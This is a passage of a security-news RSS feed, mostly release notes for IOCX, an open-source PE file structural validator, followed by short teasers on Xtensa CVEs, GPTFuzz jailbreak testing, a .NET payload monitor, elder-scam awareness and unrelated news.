<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Publishing a release of IOCX (open-source PE structural validator, MPL-2.0) and posting some format-level notes alongside it.</p> <p><strong>Write-up:</strong> <a href="https://gist.github.com/malx-labs/ce30872e5db790f25c964b4027b2b7ee">PE structural validation: format ambiguities and decoder design</a></p> <p>The notes catalogue four categories of PE specification ambiguity encountered during decoder work, with focus on delay-load imports (the richest surface). Structured as: format description grounded in the spec --&gt; the ambiguity described precisely --&gt; what IOCX chose to do about it. There are no unverified claims about how other parsers behave, however cross-tool measurement is queued as follow-up work.</p> <p>Topics covered:</p> <ul> <li><strong>Delay-load imports:</strong> v1 vs v0 attribute mode, INT/IAT parallel-array interpretation and mismatch handling, descriptor array termination when declared-size and terminator signals disagree</li> <li><strong>Exports:</strong> ENPT sort discipline (byte-wise per spec) and forwarder grammar validation</li> <li><strong>VS_VERSIONINFO:</strong> nested length prefixes, DWORD alignment enforcement, signature validation for VS_FIXEDFILEINFO, StringTable key format</li> <li><strong>Resource hierarchy:</strong> Type -&gt;Name -&gt; Language depth expectations</li> </ul> <p><strong>IOCX v0.7.5 additions relevant to structural analysis</strong>:</p> <p>Four new parser/validator pairs, 24 new reason codes with priority-resolved sub-reasons via <code>details["reason"]</code>. Delay-load specifically emits:</p> <ul> <li><code>DELAY_IMPORT_ATTRIBUTES_LEGACY_VA_MODE</code> : v0 mode detected (obsolete, spec-permitted, requires VA-to-RVA conversion for correct interpretation)</li> <li><code>DELAY_IMPORT_INT_IAT_MISMATCH</code> : parallel arrays disagree on length</li> <li><code>DELAY_IMPORT_TABLE_TRUNCATED</code> with distinct sub-tags for each termination cause (<code>delay_import_descriptor_unterminated</code>, <code>_truncated</code>, <code>_max_exceeded</code>, <code>_read_failed</code>)</li> <li><code>DELAY_IMPORT_DLL_NAME_INVALID</code> with priority-resolved sub-reasons</li> <li><code>DELAY_IMPORT_ENTRY_INVALID</code> for per-import malformations (ordinal_zero, name_unterminated, name_not_printable, etc.)</li> </ul> <p><strong>Design notes:</strong></p> <ul> <li>Byte-level parsing via <code>struct.unpack_from</code> on <code>pe.get_data()</code> byte slices; no reliance on pefile's lazy attribute interpretation</li> <li>Bounded reads throughout (descriptor arrays capped at 4096, imports per descriptor at 16384, DLL name scan at 512 bytes, IMAGE_IMPORT_BY_NAME scan at 1024)</li> <li>Parsers never raise on malformed input; failures produce tombstone tags in <code>errors[]</code> and <code>truncations[]</code> lists</li> <li>PE32+ vs PE32 thunk sizing determined once from `OPTIONAL_HEADER.Magic` and threaded through the parse</li> </ul> <p><strong>Optional Header enrichment relevant to security-posture analysis:</strong></p> <ul> <li><code>dll_characteristics_flags</code>: decoded flag list (DYNAMIC_BASE, NX_COMPAT, GUARD_CF, HIGH_ENTROPY_VA, etc.)</li> <li><code>dll_characteristics_unknown_bits</code>: hex string for any bits outside the known-flag mask</li> <li>Stack and heap sizing (reserve + commit, 64-bit on PE32+)</li> <li><code>win32_version_value</code>, <code>loader_flags</code> exposed raw</li> </ul> <p><strong>Verification:</strong></p> <p>Delay-load parser cross-checked byte-exact against <code>dumpbin /imports</code> on <code>mspaint.exe</code> : 107 imports from gdiplus.dll with agreement on names, hints, IAT addresses, ordering, and bound state.</p> <p>1370 tests at 100% line and branch coverage on new modules. Defensive <code>struct.error</code> paths covered via monkeypatched injection.</p> <p><strong>Performance</strong> ~14ms typical PE, ~1ms on adversarial minimal PE.</p> <p><strong>Deferred:</strong></p> <ul> <li>TLS Directory parser and validator (next release)</li> <li>Single-anomaly fixtures for each new reason code (~25 planned, including negative controls for the ambiguities described in the Gist)</li> <li>Cross-tool measurement study using the fixtures</li> </ul> <p><strong>Repo:</strong> <a href="https://github.com/iocx-dev/iocx">https://github.com/iocx-dev/iocx</a></p> <p><strong>CHANGELOG:</strong> <a href="https://github.com/iocx-dev/iocx/blob/main/CHANGELOG.md">https://github.com/iocx-dev/iocx/blob/main/CHANGELOG.md</a></p> <p><strong>Reason codes reference:</strong> <a href="https://github.com/iocx-dev/iocx/blob/main/docs/specs/reason-codes.md">https://github.com/iocx-dev/iocx/blob/main/docs/specs/reason-codes.md</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/iocx_dev"> /u/iocx_dev </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqt6i9/pe_structural_validation_notes_delayload_exports/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uqt6i9/pe_structural_validation_notes_delayload_exports/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Are there any known CVEs or publicly available PoCs related to vulnerabilities in the Xtensa architecture or its toolchain?]]></title>
<description><![CDATA[My friend hamza asked me.    submitted by    /u/samaxidervish   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655753/it+sicherheit/malware+trojaner+viren/are+there+any+known+cves+or+publicly+available+pocs+related+to+vulnerabilities+in+the+xtensa+architecture+or+its+toolchain/</link>
<pubDate>Thu, 09 Jul 2026 04:03:02 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1ur16fd/are_there_any_known_cves_or_publicly_available/"> <img src="https://preview.redd.it/90fcd8oxt1ch1.jpeg?width=216&amp;crop=smart&amp;auto=webp&amp;s=78c900fad7f89a221b3ecf67bf8329a61939e0cc" alt="Are there any known CVEs or publicly available PoCs related to vulnerabilities in the Xtensa architecture or its toolchain?" title="Are there any known CVEs or publicly available PoCs related to vulnerabilities in the Xtensa architecture or its toolchain?"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>My friend hamza asked me.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/samaxidervish"> /u/samaxidervish </a> <br> <span><a href="https://i.redd.it/90fcd8oxt1ch1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ur16fd/are_there_any_known_cves_or_publicly_available/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[GPTFuzz: Automatisierte KI-Jailbreaks bringen selbst ChatGPT und Llama an ihre Grenzen]]></title>
<description><![CDATA[GPTFuzz: Automatisierte KI-Jailbreaks bringen ChatGPT und Llama an ihr Limit. Ein Blick hinter den KI-Sicherheitstest.
Der Artikel GPTFuzz: Automatisierte KI-Jailbreaks bringen selbst ChatGPT und Llama an ihre Grenzen erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3654828/it+sicherheit/malware+trojaner+viren/gptfuzz+automatisierte+ki-jailbreaks+bringen+selbst+chatgpt+und+llama+an+ihre+grenzen/</link>
<pubDate>Wed, 08 Jul 2026 17:53:44 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>GPTFuzz: Automatisierte KI-Jailbreaks bringen ChatGPT und Llama an ihr Limit. Ein Blick hinter den KI-Sicherheitstest.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/kuenstliche-intelligenz/gptfuzz-automatisierte-jailbreaks-ki-sicherheit-331209.html">GPTFuzz: Automatisierte KI-Jailbreaks bringen selbst ChatGPT und Llama an ihre Grenzen</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nemesis — Native CLR Monitor for In-Memory .NET Payload (Crypters) Analysis]]></title>
<description><![CDATA[submitted by    /u/OrganizationBig4806   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3653069/it+sicherheit/malware+trojaner+viren/nemesis+-+native+clr+monitor+for+in-memory+net+payload+crypters+analysis/</link>
<pubDate>Wed, 08 Jul 2026 04:09:26 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/OrganizationBig4806"> /u/OrganizationBig4806 </a> <br> <span><a href="https://github.com/Zypherion-Technologies/Nemesis">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uqcd5u/nemesis_native_clr_monitor_for_inmemory_net/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Protect Older Adults from Financial Scams | Elder Financial Abuse Explained]]></title>
<description><![CDATA[Author: Avast - Bewertung: 0x - Views:4 Financial scams targeting older adults are on the rise — and the most dangerous ones don't start with a threat. They start with a relationship. Romance scams, fake emergency calls, and slow emotional manipulation are some of the most common tactics used to ...]]></description>
<link>https://tsecurity.de/de/3652765/it+sicherheit/malware+trojaner+viren/how+to+protect+older+adults+from+financial+scams+elder+financial+abuse+explained/</link>
<pubDate>Tue, 07 Jul 2026 23:03:51 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Z7FIol903R0?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Financial scams targeting older adults are on the rise — and the most dangerous ones don't start with a threat. They start with a relationship. Romance scams, fake emergency calls, and slow emotional manipulation are some of the most common tactics used to exploit seniors before anyone notices something is wrong. <br />
<br />
In this video, we break down how elder financial abuse actually works, the early warning signs to watch for (like sudden cash withdrawals, unpaid bills, or unusual secrecy around finances), and the practical steps families can take to protect their loved ones — without taking away their independence. <br />
<br />
You'll learn: <br />
<br />
Why urgency and isolation are scammers' most powerful tools <br />
<br />
The behavioral red flags that often appear before financial loss <br />
<br />
How to have open, proactive conversations with older family members about scams <br />
<br />
Why having a trusted emergency contact and a plan in place makes all the difference <br />
<br />
Most people don't think about identity protection until it's too late. Avast Secure Identity helps monitor for suspicious activity, supports recovery if something does go wrong, and helps protect against the financial impact of scams and theft. <br />
<br />
Protecting your family starts before scammers get the chance. <br />
<br />
🔒 Learn more about Avast Secure Identity and start protecting your family today. <br />
<br />
<br />
#ElderFinancialAbuse #ScamAwareness #CyberSafety #OnlineScams #IdentityTheft #SeniorSafety #FinancialScams #RomanceScam #AvastSecureIdentity #Avast #CyberProtection #FamilySafety #ScamPrevention #DigitalSafety #OnlineSafety <br />
<br />
Follow us: <br />
YouTube: @Avast<br />
Instagram: @avast<br />
Facebook: @Avast<br />
LinkedIn: Avast<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mario Kart auf YouTube: Fan-Projekt macht das Kult-Rennspiel im Browser spielbar]]></title>
<description><![CDATA[Mario Kart auf YouTube: Ein kreatives Fan-Projekt bringt das Kult-Rennspiel als interaktives YouTube-Video in den Browser.
Der Artikel Mario Kart auf YouTube: Fan-Projekt macht das Kult-Rennspiel im Browser spielbar erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3651994/it+sicherheit/malware+trojaner+viren/mario+kart+auf+youtube+fan-projekt+macht+das+kult-rennspiel+im+browser+spielbar/</link>
<pubDate>Tue, 07 Jul 2026 17:19:00 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mario Kart auf YouTube: Ein kreatives Fan-Projekt bringt das Kult-Rennspiel als interaktives YouTube-Video in den Browser.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/gaming/mario-kart-auf-youtube-331185.html">Mario Kart auf YouTube: Fan-Projekt macht das Kult-Rennspiel im Browser spielbar</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Indische Telekommunikationsbehörde MIB zwingt Telegram zu Anti-Piraterie-Filtern]]></title>
<description><![CDATA[Die indische Behörde MIB will Telegram trotz fehlender Zuständigkeit zur Einrichtung von Filtern zwingen, dies ohne jede Rechtsgrundlage.
Der Artikel Indische Telekommunikationsbehörde MIB zwingt Telegram zu Anti-Piraterie-Filtern erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3651952/it+sicherheit/malware+trojaner+viren/indische+telekommunikationsbehoerde+mib+zwingt+telegram+zu+anti-piraterie-filtern/</link>
<pubDate>Tue, 07 Jul 2026 17:03:45 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Die indische Behörde MIB will Telegram trotz fehlender Zuständigkeit zur Einrichtung von Filtern zwingen, dies ohne jede Rechtsgrundlage.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/netzpolitik/indische-telekommunikationsbehoerde-mib-zwingt-telegram-zu-anti-piraterie-filtern-331184.html">Indische Telekommunikationsbehörde MIB zwingt Telegram zu Anti-Piraterie-Filtern</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,13ms -->